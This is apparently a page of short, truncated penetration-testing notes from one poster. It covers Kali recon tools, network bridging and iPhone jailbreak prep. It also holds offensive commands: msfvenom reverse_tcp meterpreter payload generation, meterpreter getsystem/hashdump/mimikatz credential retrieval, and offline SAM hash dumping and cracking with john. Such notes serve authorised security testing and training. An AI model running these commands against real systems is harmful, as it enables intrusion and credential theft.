Latest notes for PenTesting- MrLeet

MrLeet provides materials allowing anyone to gain practical hands-on experience with digital security, computer applications and network administration tasks.
By: ajayverma 2019-06-25 11:20:34

[+] Reminders


Metasploit - spool /home/<username>/console.log
Linux Terminal - script /home/<username>/Engagements/TestOutput.txt #Type exit to stop

Set IP address
ifconfig eth0

Set default gateway
route add default gw

Set DNS servers
echo "nameserver

Score: 0

By: ajayverma 2019-06-25 11:20:37

python.exe c:\Python27\PyInstaller-2.1\ --noconsole --onefile c:\Python27\PyInstaller-2.1\

[+] Generate the .spec file.
[+] Windows: (You want a single EXE file with your data in it, hence --onefile).

python --onefile

[+] Rebuild your package.

python your_main...

Score: 0

By: ajayverma 2019-06-25 11:20:41

The Checklist

[+] Information Gathering

Manually explore the site
Spider/crawl for missed or hidden content
Check for files that expose content, such as robots.txt, sitemap.xml, .DS_Store
Check the caches of major search engines for publicly accessible sites
Check for differences in content based on User Agent (eg, Mobile sites, access as...

Score: 0

By: ajayverma 2019-06-25 11:20:44

Tools within Kali:

root@kali:~# oscanner -s -P 1040

root@kali:~# sidguess -i -d /usr/share/wordlists/metasploit/unix_users.txt

root@kali:~# tnscmd10g version -h

nmap -p 1521 -A

Nmap nse scripts
Metasploit auxiliaries...

Score: 0

By: ajayverma 2019-06-25 11:20:48

[+] Setting up an Ethernet bridge in Ubuntu/Kali Linux

# Install bridge-utils
sudo apt-get install bridge-utils

# Disable network-manager + firewall

# Configuration

ifconfig eth0
ifconfig eth1
brctl addbr br0
brctl addif br0 eth0
brctl addif br0 eth1
ifconfig br0 up
dhclient br0

sudo tcpdump -i br0...

Score: 0

By: ajayverma 2019-06-25 11:20:51

------------------------------------------ Mobile Application Test Notes (iPhone)

Prepping Device and Application:

[+] Jailbreak iPhone/iPad - Green Poison / Absinthe 2.04
[+] Enable SSH on iPhone/iPad
[+] Install iFunbox to install the application (
[+] Connect device to lab wireless network
[+] Add web proxy se...

Score: 0

By: ajayverma 2019-06-25 11:20:57

[+] Creating Metasploit Payloads

List payloads
msfvenom -l


msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f elf > shell.elf

msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f ex...

Score: 0

By: ajayverma 2019-06-25 11:21:01

[+] Meterpreter Shell

meterpreter > sysinfo

meterpreter > getuid

meterpreter > getsystem

meterpreter > hashdump

meterpreter > load/use mimikatz

kerberos Attempt to retrieve kerberos creds
livessp Attempt to retrieve livessp creds
mimikatz_command Run a custom commannd
msv Attempt...

Score: 0

By: ajayverma 2019-06-25 11:21:04

fdisk -l

mount -t ntfs /dev/sda1 /mnt

df -k

cd /mnt
cd WINDOWS/system32/config

bkhive system /root/hive.txt
samdump2 SAM /root/hive.txt > /root/hash.txt

john /root/hash.txt -format=nt2 -users=Administrator
cd /root/.john
ls -l
cat john.pot...

Score: 0

By: ajayverma 2019-06-25 11:21:08

Aggressive Mode VPN -- IKE-Scan, PSK-Crack

In IKE Aggressive mode the authentication hash based on a preshared key (PSK) is transmitted as response to the initial packet of a vpn client that wants to establish an IPSec Tunnel (Hash_R). This hash is not encrypted. It's possible to capture these packets using a sniffer, for example tcpdump an...

Score: 0